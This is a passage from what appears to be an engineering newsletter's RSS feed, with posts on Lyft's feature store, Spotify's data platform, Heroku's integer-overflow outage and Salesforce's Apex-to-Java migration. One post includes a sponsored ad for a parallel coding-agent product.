https://substackcdn.com/image/fetch/$s_!l6C-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!l6C-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp" width="1456" height="1096" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1096,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:96922,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/webp&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://bytesizeddesign.substack.com/i/184264464?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!l6C-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 424w, https://substackcdn.com/image/fetch/$s_!l6C-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 848w, https://substackcdn.com/image/fetch/$s_!l6C-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 1272w, https://substackcdn.com/image/fetch/$s_!l6C-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>The Three Feature Families</h3><p>Lyft split their world into batch, streaming, and online. Not revolutionary, but the execution matters.</p><p><strong>Batch features</strong> (the workhorse):</p><ul><li><p>Customer writes SparkSQL query + simple JSON config</p></li><li><p>Python cron generates production Airflow DAG automatically</p></li><li><p>DAG handles compute, storage, quality checks, discovery&#8212;everything</p></li><li><p>Data lands in both Hive (offline training) and DynamoDB (online serving)</p></li></ul><p><strong>Streaming features</strong> (the real-time stuff):</p><ul><li><p>Flink apps read from Kafka/Kinesis</p></li><li><p>Transform data, add metadata</p></li><li><p>Sink to <code>spfeaturesingest</code> service</p></li><li><p>Service handles serialization and writes to online store</p></li></ul><p><strong>Online serving</strong> (<code>dsfeatures</code>):</p><ul><li><p>DynamoDB as source of truth</p></li><li><p>ValKey (Redis fork) write-through cache on top</p></li><li><p>OpenSearch for embeddings</p></li><li><p>Go and Python SDKs expose full CRUD</p></li></ul><p>The smart part? Whether you write features via batch DAG, streaming app, or direct API call, they all land in the same online store with identical metadata. No &#8220;training/serving skew&#8221; headaches.</p><h3>The Part That Actually Matters</h3><p>Most feature stores fail because they&#8217;re too clever. Lyft succeeded because they made everything stupidly simple:</p><p><strong>For feature creation:</strong><br>SparkSQL query + JSON config. That&#8217;s it.</p><p>json</p><pre><code><code>{
  "owner": "pricing-team",
  "urgency": "high",
  "refresh_cadence": "daily",
  "features": {...}
}</code></code></pre><p>sql</p><pre><code><code>SELECT 
  user_id,
  avg(ride_cost) as avg_ride_cost_30d
FROM rides
WHERE dt &gt;= date_sub(current_date, 30)
GROUP BY user_id</code></code></pre><p>No YAML hell. No custom DSLs. Just SQL and basic metadata.</p><p><strong>For feature retrieval:</strong><br>SDK method calls. <code>Get()</code> or <code>BatchGet()</code>. Returns data in whatever format your service speaks.</p><p>They optimized for the 90% use case: SQL-proficient engineers who want to ship fast and move on.</p><div><hr></div><h2>&#128161; What They Got Right</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/processing-trillions-how-lyfts-feature">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[The Trillion-Event Platform: How Spotify Built a Data System That Doesn't Break]]></title><description><![CDATA[TL;DR Spotify processes 1.4 trillion data points daily.]]></description><link>https://read.bytesizeddesign.com/p/the-trillion-event-platform-how-spotify</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/the-trillion-event-platform-how-spotify</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Sat, 27 Dec 2025 04:59:18 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!D7y2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>TL;DR</strong></p><p>Spotify processes 1.4 trillion data points daily. Spotify grew from managing Europe&#8217;s largest Hadoop cluster to a 100+ engineer team running a full GCP-based platform. The key was when they stopped treating the data platform like infrastructure and started treating it like a product with real customers.</p><div><hr></div><h2>&#127919; The Problem Space</h2><p>Most companies hit the &#8220;we need a data platform&#8221; moment when their Slack is flooded with:</p><ul><li><p>&#8220;Where&#8217;s that dataset again?&#8221;</p></li><li><p>&#8220;Why did this pipeline fail overnight?&#8221;</p></li><li><p>&#8220;Can someone explain why our numbers don&#8217;t match?&#8221;</p></li></ul><p>Spotify hit all these triggers, but they also had a unique constraint: when your product <em>is</em> personalization, data isn&#8217;t a nice-to-have. It&#8217;s the entire business.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!D7y2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!D7y2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 424w, https://substackcdn.com/image/fetch/$s_!D7y2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 848w, https://substackcdn.com/image/fetch/$s_!D7y2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 1272w, https://substackcdn.com/image/fetch/$s_!D7y2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!D7y2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png" width="788" height="309" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:309,&quot;width&quot;:788,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:51616,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://bytesizeddesign.substack.com/i/182678152?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!D7y2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 424w, https://substackcdn.com/image/fetch/$s_!D7y2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 848w, https://substackcdn.com/image/fetch/$s_!D7y2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 1272w, https://substackcdn.com/image/fetch/$s_!D7y2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>At scale, this meant:</p><ul><li><p><strong>1 trillion+ events per day</strong> flowing through event delivery</p></li><li><p><strong>38,000+ scheduled pipelines</strong> running hourly and daily</p></li><li><p><strong>1,800+ event types</strong> representing user interactions</p></li><li><p>Teams across payments, ML, experimentation, and product all needing reliable, fast access</p></li></ul><h2>&#127959;&#65039; Architecture That Actually Scales</h2><h3>The Three-Pillar Model</h3>
      <p>
          <a href="https://read.bytesizeddesign.com/p/the-trillion-event-platform-how-spotify">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[The 2.1 Billion Problem: How a Single Integer Broke Heroku's API]]></title><description><![CDATA[Inside the 4-Hour Heroku Outage: The Critical Lesson on Integer Overflow, Schema Drift, and the Hidden Danger of Database Statistics]]></description><link>https://read.bytesizeddesign.com/p/the-21-billion-problem-how-a-single</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/the-21-billion-problem-how-a-single</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Tue, 23 Dec 2025 07:08:39 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/a96c3e12-87c1-4bd0-9a6e-8b4edf0beec9_1000x500.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>TL;DR</h2><p>Heroku&#8217;s API went dark for 4 hours because a foreign key used <code>int32</code> while its primary key was <code>int64</code>. When the counter hit 2.1 billion, everything broke. The engineers ran a migration to fix it, which worked but cleared Postgres&#8217;s query statistics and made everything <em>worse</em>. Running apps stayed up; everything else died.</p><div><hr></div><h2>What Went Down</h2><p>Somewhere in Heroku&#8217;s database, a primary key was happily incrementing as a <code>bigint</code>. A foreign key pointing to it was using a regular <code>int</code>. </p><p>This went unnoticed for years until the primary key exceeded 2.1 billion and the foreign key couldn&#8217;t keep up. Integer overflow. Auth system down. Customers locked out.</p><p>On-call engineers wrote a migration to upsize the foreign key to match. The migration ran successfully and new authorizations started working again. Crisis averted.</p><p>Except it wasn&#8217;t. Altering that column wiped Postgres&#8217;s internal statistics&#8212;the data the query optimizer uses to plan efficient queries. Without those stats, queries that normally took milliseconds started taking seconds. The partial outage became a complete API failure.</p><p>They put the API in read-only mode, fixed the statistics, monitored everything, and gradually brought the system back up. Total time down: just under 4 hours.</p><h2>Senior Engineer Takeaways</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/the-21-billion-problem-how-a-single">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[How Salesforce Migrated 7 Years of Legacy in 4 Months Instead of 2 Years]]></title><description><![CDATA[Build Apps with Parallel Coding Agents With One Prompt]]></description><link>https://read.bytesizeddesign.com/p/how-salesforce-migrated-7-years-of</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-salesforce-migrated-7-years-of</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Wed, 17 Dec 2025 17:20:46 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!4vTC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!4vTC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!4vTC!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png 424w, https://substackcdn.com/image/fetch/$s_!4vTC!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png 848w, https://substackcdn.com/image/fetch/$s_!4vTC!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png 1272w, https://substackcdn.com/image/fetch/$s_!4vTC!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!4vTC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png" width="951" height="511" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:511,&quot;width&quot;:951,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:752108,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://bytesizeddesign.substack.com/i/181762586?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!4vTC!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png 424w, https://substackcdn.com/image/fetch/$s_!4vTC!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png 848w, https://substackcdn.com/image/fetch/$s_!4vTC!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png 1272w, https://substackcdn.com/image/fetch/$s_!4vTC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e340d2d-3de3-4e82-a859-e3456b256d58_951x511.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2><strong>Build Apps with Parallel Coding Agents With One Prompt</strong></h2><p>Imagine shipping backend services, UI components, refactors, tests, and full features &#8212; all from a single prompt, without manually writing specs, breaking down tasks, or stitching AI outputs together.</p><p>That&#8217;s the power of <strong><a href="https://hubs.la/Q03XQj9K0">Zenflow</a> (by Zencoder)</strong>, a new way of building software with <strong>spec-driven AI workflows</strong> and <strong>parallel coding agents</strong>.</p><p>With Zenflow you get: <br><br><strong>&#129513; Spec-Driven Development (SDD)</strong></p><p>Agents plan, gather requirements and build specs, always being anchored to evolving specs instead of random chats. They follow the same discipline your best engineers use.</p><h3><strong>&#129309; Multi-Agent Verification</strong></h3><p>Agents cross-check each other&#8217;s work so <em>you</em> don&#8217;t have to. Drift and slop get caught before they ever reach you.</p><h3><strong>&#9889; Parallelization at Scale</strong></h3><p>One engineer. A fleet of agents. Workflows that turn weeks into hours.</p><h3>&#128421;&#65039; <strong>AI-First UX</strong></h3><p>Kanban, tasks, subtasks, inbox - finally a UI built for managing AI work at scale.</p><h3>&#128260; <strong>Auto-Generated Task Flows</strong></h3><p> We break work into steps automatically. Less AI babysitting. More shipping.</p><h3>&#127919; <strong>Model Diversity</strong></h3><p> Different AI models challenge each other&#8217;s assumptions and catch blind spots.<br> Better accuracy, fewer surprises</p><p><strong>Stop gambling with prompts. Start orchestrating.<br><br><a href="https://hubs.la/Q03XQj9K0">GET STARTED FOR FREE</a></strong></p><div><hr></div><p>Salesforce&#8217;s Own Archive ran fine as a third-party managed package. By 2024, enterprise customers demanded native platform integration because compliance teams won&#8217;t sign off on external packages managing core archival data.</p><p>The problem? Seven years of undocumented Apex with static methods everywhere. Thousands of tightly coupled files. Deep dependency chains that made file-by-file translation impossible. And multi-tenant Core infrastructure that would choke on single-tenant static designs.</p><p>The fix? Dependency graph analysis to identify migration order. Leaf-to-root refactoring that built stable foundations first. Automated transformation with human-validated architectural patterns. And service-layer redesign that turned static spaghetti into scalable Java without breaking production.</p><div><hr></div><h2><strong>&#128680; The Breaking Points</strong></h2><p><strong>Manual Migration Math Didn&#8217;t Work</strong></p><p>Initial estimates: 2 years. The team had 275 Apex classes, 3,537 total files, and zero documentation on what half of them did. Engineers would need to:</p><ul><li><p>Read every file to understand business logic</p></li><li><p>Manually rewrite Apex patterns into Java equivalents</p></li><li><p>Refactor static methods into multi-tenant service layers</p></li><li><p>Test each change against production behavior</p></li></ul><p>Even small migrations took months. Scale that to thousands of interdependent files? The calendar said 2027 before customers saw value.</p><p><strong>Dependency Hell Made Isolated Translation Impossible</strong></p><p>You can&#8217;t just convert <code>PaymentProcessor.apex</code> to <code>PaymentProcessor.java</code> and call it done. That file calls <code>UtilityHelpers</code>, which references <code>SharedConstants</code>, which imports <code>LegacyDataMapper</code>. Convert one in isolation and you get:</p><ul><li><p>Incomplete method signatures (where&#8217;s that utility method?)</p></li><li><p>Ambiguous return types (what does this constant actually mean?)</p></li><li><p>Code that compiles but behaves wrong at runtime</p></li></ul><p>Translation order mattered. The system didn&#8217;t have one.</p><p><strong>Static Methods Killed Multi-Tenancy</strong></p><p>The managed package loved static classes and global shared state. Worked great when Customer A&#8217;s instance ran separately from Customer B&#8217;s. Breaks catastrophically in Core&#8217;s shared infrastructure where 50 customers hit the same code simultaneously.</p><p>Direct syntax conversion would reproduce single-tenant assumptions. Memory leaks. Isolation violations. Performance collapse under load. The architecture needed fundamental redesign, not just language translation.</p><div><hr></div><h2><strong>&#128269; Root Causes</strong></h2><p><strong>1. Package-First Design Assumed Isolation</strong></p><p>Seven years of development optimized for standalone deployment. Every architectural decision&#8212;static methods, global state, tight coupling&#8212;made sense in that context. Moving to shared multi-tenant infrastructure meant those same decisions became liabilities.</p><p><strong>2. No Documentation, No Dependency Map</strong></p><p>Legacy code accumulates logic faster than teams document it. Files referenced each other through years of incremental changes. Nobody had a complete picture of what depended on what. Manual analysis would take months before migration even started.</p><p><strong>3. Manual Effort Doesn&#8217;t Scale to Thousands of Files</strong></p><p>Rewriting code file-by-file works for small projects. At scale, it&#8217;s a coordination nightmare. Engineers step on each other. Changes ripple unpredictably. Regression risk compounds. The process itself becomes the bottleneck.</p><div><hr></div><h2><strong>&#129504; The Solution Architecture</strong></h2><p><strong>1. Dependency Graph Analysis Revealed Migration Order</strong></p><p>First step: Generate a complete dependency graph of the entire codebase. Map every class relationship. Identify which files depend on which.</p><p>This revealed natural layers:</p><ul><li><p><strong>Leaf nodes</strong>: Constants, utilities, helpers&#8212;no dependencies</p></li><li><p><strong>Mid-level</strong>: Business logic that calls leaf nodes</p></li><li><p><strong>Root nodes</strong>: Workflows that orchestrate everything</p></li></ul><p>Migration order emerged automatically: Convert leaves first, then build upward.</p><p><strong>The Cold Start Problem</strong>: You still need to understand what each file does. Solution: Start with the simplest leaf nodes (constants, basic utilities) that have obvious behavior. Use those as reference implementations when converting more complex files up the chain.</p><p>Result: Stable foundation. Each layer referenced only verified code from below. No guesswork about what upstream dependencies should look like.</p><p><strong>2. Automated Transformation with Pattern-Based Rules</strong></p><p>Defined transformation rules that encoded Core&#8217;s architectural patterns:</p><ul><li><p>Convert static methods to service-layer classes</p></li><li><p>Replace global state with dependency injection</p></li><li><p>Separate concerns into clear object-oriented boundaries</p></li></ul><p>Engineers reviewed output at each layer, adjusting rules as deeper refactoring needs surfaced. Not &#8220;let the machine write code unsupervised&#8221;&#8212;but &#8220;automate the mechanical translation, validate the architectural decisions.&#8221;</p><p>Critical constraint: Every generated file must compile and pass basic linting before moving to the next layer. Cascading errors break the pipeline.</p><p><strong>3. Test Suite Redesign Instead of Direct Migration</strong></p><p>Directly migrating Apex unit tests would reproduce legacy assumptions. Instead:</p><ul><li><p>Extract logical intent from each test</p></li><li><p>Rewrite test suites in Java against new service boundaries</p></li><li><p>Validate behavior, not implementation details</p></li></ul><p>Example: Old test checked that <code>StaticProcessor.calculate()</code> returned 42. New test validates that the payment service produces correct amounts regardless of implementation approach.</p><p>Result: Tests that verify the system works, not that it works the same way.</p><p><strong>4. Layered Validation Beyond Automation</strong></p><p>Code generation got the team 80% there. The remaining 20% required:</p><ul><li><p>Manual end-to-end flow testing</p></li><li><p>Bug bash sessions with engineers outside the core team</p></li><li><p>Early deployment cycles that surfaced integration issues</p></li><li><p>Planned Selenium automation for UI regression coverage</p></li></ul><p>Early cycles found many issues. Later phases found only a few. The release stabilized through systematic validation, not hope.</p><div><hr></div><h2><strong>&#129520; The Cascade of Benefits</strong></h2><p><strong>Before</strong>: Manual file-by-file &#8594; 2 years &#8594; huge regression risk &#8594; blocked on engineer availability</p><p><strong>After</strong>: Dependency-driven automation &#8594; 4 months &#8594; layered validation &#8594; same team manages 2x the code</p><p>Unlocked outcomes:</p><ul><li><p>Native platform integration (compliance teams happy)</p></li><li><p>Unified deployment pipelines (security scanning built-in)</p></li><li><p>Consistent architectural patterns (easier to maintain)</p></li><li><p>Doubled codebase managed by same headcount (support both versions during transition)</p></li></ul><div><hr></div><h2><strong>&#129300; Lessons Learned</strong></h2><p><strong>1. Dependency Order Is Migration Strategy</strong></p><p>You can&#8217;t translate interdependent code in random order. Graph analysis isa must have. Leaf-to-root migration prevents cascading errors and provides stable reference implementations at each layer.</p><p><strong>2. Automation Requires Architectural Constraints</strong></p><p>Pattern-based transformation only works when you define clear target patterns. &#8220;Convert this Apex to Java&#8221; is too vague. &#8220;Convert static methods to service classes with dependency injection following these specific conventions&#8221; gives automation something to execute.</p><p><strong>3. Tests Validate Intent, Not Implementation</strong></p><p>Migrating legacy tests 1:1 preserves old assumptions. Rewriting tests against new boundaries validates that the system solves the same problems, even if implementation differs. This catches architectural mismatches automation can&#8217;t see.</p><p><strong>4. Scale Changes What&#8217;s Possible</strong></p><p>Manual migration works for 10 files. Breaks at 100. Completely infeasible at 3,537. The volume itself forced process innovation&#8212;dependency graphs, automated transformation, layered validation. Sometimes constraints drive better solutions than greenfield freedom.</p><p><strong>5. Human Validation Remains Non-Negotiable</strong></p><p>Automated translation accelerated development. But functional correctness required systematic testing, manual review, and iterative refinement. Code that compiles isn&#8217;t code that works. Speed without validation just ships bugs faster.</p><div><hr></div><h2><strong>&#127959;&#65039; What Salesforce Built to Make This Work</strong></h2><ul><li><p>Dependency graph generator for entire managed 